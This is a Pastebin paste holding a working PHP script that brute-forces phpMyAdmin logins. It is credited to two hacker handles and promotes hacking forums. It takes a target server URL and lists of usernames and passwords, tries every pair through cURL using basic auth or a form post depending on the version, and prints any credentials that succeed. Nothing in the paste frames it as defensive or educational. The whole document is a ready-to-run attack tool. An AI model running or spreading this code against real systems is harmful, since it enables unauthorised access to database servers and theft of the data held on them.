Advertisement
Guest User

Untitled

a guest
Jan 16th, 2017
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. ?>
  4. <html dir="ltr">
  5. <head>
  6. <title>PhpMyAdmin Brute Force |By Mr.731MY - DR.THMOORY</title>
  7. <style>
  8. *{font-family:tahoma;font-size:12; }
  9. body{background-color:#f1f1f1;}
  10. td,tr{text-align:center;}
  11. td:hover{background-color:#e1e1e1;}
  12. input[type=submit]{cursor:wait;}
  13. </style>
  14. </head>
  15. <body>
  16. <center>
  17. <form method="post">
  18. <table width="20%">
  19. <tr>
  20. <td colspan="2"><input type="text" value="<?=$server;?>" name="server" placeholder="server" size="60" style="direction:ltr;"/></td>
  21. </tr>
  22. <tr>
  23. <td>Passwords</td>
  24. <td>Users</td>
  25. </tr>
  26. <tr>
  27. <td><textarea name="passwords" cols="20" rows="20" style="direction:ltr;"><?=$passwords;?></textarea></td>
  28. <td><textarea name="usernames" cols="20" rows="20" style="direction:ltr;"><?=$usernames;?></textarea></td>
  29. </tr>
  30. <tr>
  31. <td>Old Version<input type="radio" name="type1" value="old" <?=($_POST['type1']=='old') ? 'checked' : '' ?>></td>
  32. <td>New Version<input type="radio" name="type1" value="new" <?=($_POST['type1']=='new') ? 'checked' : '' ?>></td>
  33. </tr>
  34. <tr>
  35. <td colspan="2"><input type="submit" name="start" value="start" /></td>
  36. </tr>
  37. </table>
  38. </form>
  39. <?
  40. $usernames = trim($_POST['usernames']);
  41. $passwords = trim($_POST['passwords']);
  42. $server = trim($_POST['server']);
  43. $submit = $_POST['start'];
  44. $type = $_POST['type1'];
  45. if($type=='old'){$ver = 1;}else{$ver=2;}
  46. $array = array(" ","\n"," ");
  47. if(isset($submit) and !empty($usernames) and !empty($passwords) and !empty($server)){
  48. $exuser = explode("\n",$usernames);
  49. foreach($exuser as $exuser){
  50. $expass = explode("\n",$passwords);
  51. foreach($expass as $expass){
  52. $exuser = str_ireplace($array,"",$exuser);
  53. $expass = str_ireplace($array,"",$expass);
  54. brute_phpmyadmin(trim($server),trim($exuser),trim( $expass),$ver);
  55. }
  56. }
  57. }
  58. function brute_phpmyadmin($url,$user,$pass,$verion='1'){
  59. $ch = curl_init($url);
  60. curl_setopt($ch, CURLOPT_HEADER, 0);
  61. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  62. curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  63. curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  64. curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  65. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  66. if($verion==2){
  67. curl_setopt($ch, CURLOPT_POST, 1);
  68. curl_setopt($ch, CURLOPT_POSTFIELDS,"pma_username=$user&pma_password=$pass&server=1&target=index.php");
  69. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  70. $exec=curl_exec($ch);
  71. curl_close($ch);
  72. if(!eregi("#1045",$exec)){
  73. echo "Succ : username '$user' and password '$pass'<br />";
  74. }
  75. }else{
  76. $exec = curl_exec($ch);
  77. curl_close($ch);
  78. if(!eregi("Wrong username",$exec)){
  79. echo "Succ : username '$user' and password '$pass'<br />";
  80. }
  81. }
  82. }
  83. Print "Coder Mr.Mr.731MY , DR.THMOORY <br />";
  84. print "sec4ever.com : vbspiders.com";
  85. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement